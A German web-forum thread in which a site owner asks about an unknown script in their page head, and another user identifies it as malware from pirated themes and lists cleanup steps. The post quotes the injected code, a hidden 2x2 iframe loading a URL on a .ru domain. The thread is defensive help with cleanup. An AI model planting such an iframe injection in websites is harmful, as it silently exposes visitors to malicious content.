Was ist das für ein Script oder Plugin?

• Wenn dieser Beitrag hier falsch platziert sein soll, dann bitte in das richtige Themengebiet verschieben.

Ich habe seit ein paar Tagen im Head-Bereich ein ungewöhnliches Script.

<script type="text/javascript">
    document.write('<iframe src="http://flipsphere.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
    </script>

Ich bin mir nicht sicher was dieses Script macht. Ist das ein Virus. Wird dieses Script durch ein Plugin installiert? Höhe und Breite 2 finde ich verdächtig. Welches Plugin ist das womöglich?

Danke für entsprechende Antworten.

Grüße aus Hamburg

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• Es gewährt einem Zugriff auf dein System und gehört zur Maleware und Co. Sowas ist meistens in Themes zu finden die gekauft wurden und illegal auf diversen Seiten verbreitet werden ;)

1) Sofort den Bereich rauslöschen und deine PHP Dateien nach diesem Link durchsuchen vllt. ist es noch woanders eingebaut
    2) Passwörter neu aufsetzen > Blog, Server, Zugangsdaten - Einfach alles neu.
    3) Antivrus, Comodo, Bitdefender auf deinem Computer laufen lassen.
    4) In Zukunft nur Plugins und Themes von seriösen Seiten runterladen (und vielleicht erst auf einem Wordpress Testsystem installieren).

Gruß
    Peter

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!